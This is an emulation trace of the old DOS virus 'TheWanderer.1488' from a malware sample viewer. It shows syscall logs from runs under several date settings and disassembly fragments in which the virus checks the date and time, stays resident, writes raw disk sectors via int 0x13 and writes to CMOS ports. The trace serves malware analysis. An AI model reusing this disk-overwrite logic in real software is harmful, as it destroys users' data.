Sample viewer

vx.netlux.org/Virus.DOS.TheWanderer.1488

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:44:04.445610737Z 240 PC: 12dcd | UNKNOWN!
2018-12-17T22:44:04.446725651Z 255 PC: 12e3d | UNKNOWN!
2018-12-17T22:44:04.448569855Z 74 PC: 12ed0 | Reallocate memory
2018-12-17T22:44:04.450300245Z 75 PC: 12f36 | Execute program
2018-12-17T22:44:04.466970384Z 76 PC: 13235 | Terminate with return code (Return code = '0')
2018-12-17T22:44:04.4710093Z 73 PC: 12f3c | Release memory
2018-12-17T22:44:04.472739469Z 77 PC: 12f40 | Get program return code
2018-12-17T22:44:04.474359893Z 42 PC: 12f44 | Get date
0x12f44: cmp al, 0
0x12f46: jne 0x12f51
0x12f48: mov ah, 0x2c
0x12f4a: int 0x21
0x12f4c: cmp cl, 0x2c
0x12f4f: je 0x12f59
0x12f51: mov ah, 0x31
0x12f53: mov dx, 0x75
0x12f56: call 0x22a9e
0x12f59: mov ah, 0x19
0x12f5b: int 0x21
0x12f5d: mov dl, al
0x12f5f: cmp dl, 2
0x12f62: jb 0x12f66
0x12f64: add al, 0x7e
0x12f66: mov ax, 0x309
0x12f69: mov bx, 0x617
0x12f6c: mov cx, 1
0x12f6f: mov dh, 0
0x12f71: int 0x13
2018-12-17T22:44:04.477489772Z 49 PC: 12aa4 | Terminate and stay resident (Return code = '1' | Memory size = '117')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8094,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:20.617033379Z 240 PC: 12dcd | UNKNOWN!
2018-12-25T12:03:20.61916073Z 255 PC: 12e3d | UNKNOWN!
2018-12-25T12:03:20.620938613Z 74 PC: 12ed0 | Reallocate memory
2018-12-25T12:03:20.622766302Z 75 PC: 12f36 | Execute program
2018-12-25T12:03:20.639526284Z 76 PC: 13235 | Terminate with return code (Return code = '0')
2018-12-25T12:03:20.642678133Z 73 PC: 12f3c | Release memory
2018-12-25T12:03:20.644072433Z 77 PC: 12f40 | Get program return code
2018-12-25T12:03:20.646567428Z 42 PC: 12f44 | Get date
0x12f44: cmp al, 0
0x12f46: jne 0x12f51
0x12f48: mov ah, 0x2c
0x12f4a: int 0x21
0x12f4c: cmp cl, 0x2c
0x12f4f: je 0x12f59
0x12f51: mov ah, 0x31
0x12f53: mov dx, 0x75
0x12f56: call 0x22a9e
0x12f59: mov ah, 0x19
0x12f5b: int 0x21
0x12f5d: mov dl, al
0x12f5f: cmp dl, 2
0x12f62: jb 0x12f66
0x12f64: add al, 0x7e
0x12f66: mov ax, 0x309
0x12f69: mov bx, 0x617
0x12f6c: mov cx, 1
0x12f6f: mov dh, 0
0x12f71: int 0x13
2018-12-25T12:03:20.648676826Z 49 PC: 12aa4 | Terminate and stay resident (Return code = '2' | Memory size = '117')

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8094,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:20.978913061Z 240 PC: 12dcd | UNKNOWN!
2018-12-25T12:03:20.980807851Z 255 PC: 12e3d | UNKNOWN!
2018-12-25T12:03:20.98225399Z 74 PC: 12ed0 | Reallocate memory
2018-12-25T12:03:20.984061276Z 75 PC: 12f36 | Execute program
2018-12-25T12:03:21.003939035Z 76 PC: 13235 | Terminate with return code (Return code = '0')
2018-12-25T12:03:21.007315602Z 73 PC: 12f3c | Release memory
2018-12-25T12:03:21.008698033Z 77 PC: 12f40 | Get program return code
2018-12-25T12:03:21.009873532Z 42 PC: 12f44 | Get date
0x12f44: cmp al, 0
0x12f46: jne 0x12f51
0x12f48: mov ah, 0x2c
0x12f4a: int 0x21
0x12f4c: cmp cl, 0x2c
0x12f4f: je 0x12f59
0x12f51: mov ah, 0x31
0x12f53: mov dx, 0x75
0x12f56: call 0x22a9e
0x12f59: mov ah, 0x19
0x12f5b: int 0x21
0x12f5d: mov dl, al
0x12f5f: cmp dl, 2
0x12f62: jb 0x12f66
0x12f64: add al, 0x7e
0x12f66: mov ax, 0x309
0x12f69: mov bx, 0x617
0x12f6c: mov cx, 1
0x12f6f: mov dh, 0
0x12f71: int 0x13
2018-12-25T12:03:21.0147422Z 44 PC: 12f4c | Get time
0x12f4c: cmp cl, 0x2c
0x12f4f: je 0x12f59
0x12f51: mov ah, 0x31
0x12f53: mov dx, 0x75
0x12f56: call 0x22a9e
0x12f59: mov ah, 0x19
0x12f5b: int 0x21
0x12f5d: mov dl, al
0x12f5f: cmp dl, 2
0x12f62: jb 0x12f66
0x12f64: add al, 0x7e
0x12f66: mov ax, 0x309
0x12f69: mov bx, 0x617
0x12f6c: mov cx, 1
0x12f6f: mov dh, 0
0x12f71: int 0x13
0x12f73: mov cx, 0x40
0x12f76: mov al, cl
0x12f78: out 0x70, al
0x12f7a: mov al, 0xff
2018-12-25T12:03:21.017203367Z 49 PC: 12aa4 | Terminate and stay resident (Return code = '0' | Memory size = '117')